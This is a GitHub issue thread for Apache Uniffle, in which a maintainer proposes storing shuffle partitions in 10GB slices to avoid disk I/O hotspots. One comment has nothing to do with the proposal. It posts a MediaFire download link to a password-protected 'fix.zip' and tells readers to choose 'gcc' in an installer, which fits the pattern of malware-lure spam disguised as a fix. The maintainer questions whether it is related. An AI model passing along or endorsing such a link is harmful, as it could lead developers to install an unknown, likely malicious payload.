### ISSUE TITLE
[FEATURE] Rss partition sliced store

### ISSUE THREAD

**Issue by maobaolong** [apache/incubator-uniffle#2086]
### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

### Search before asking

- [X] I have searched in the [issues](https://github.com/apache/incubator-uniffle/issues?q=is%3Aissue) and found no similar issues.

### Describe the feature

RSS store partition divided by `slice`, default to `10GB`.

### Motivation

Avoid a single extremely huge partition waste whole node/disk io.

### Describe the solution

RSS store partition divided by `slice`, default to `10GB`, then a 21G partition can stored to 3 slice.

### Additional context

https://docs.google.com/document/d/1R9LcPIkmWml0aD3rQbhKgO9qWBSE9NknRCyhljC09Uw/edit?usp=sharing

### Are you willing to submit PR?

- [X] Yes I am willing to submit a PR!

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by maobaolong** [comment]
@Diganta-18 Is this related to this issue?
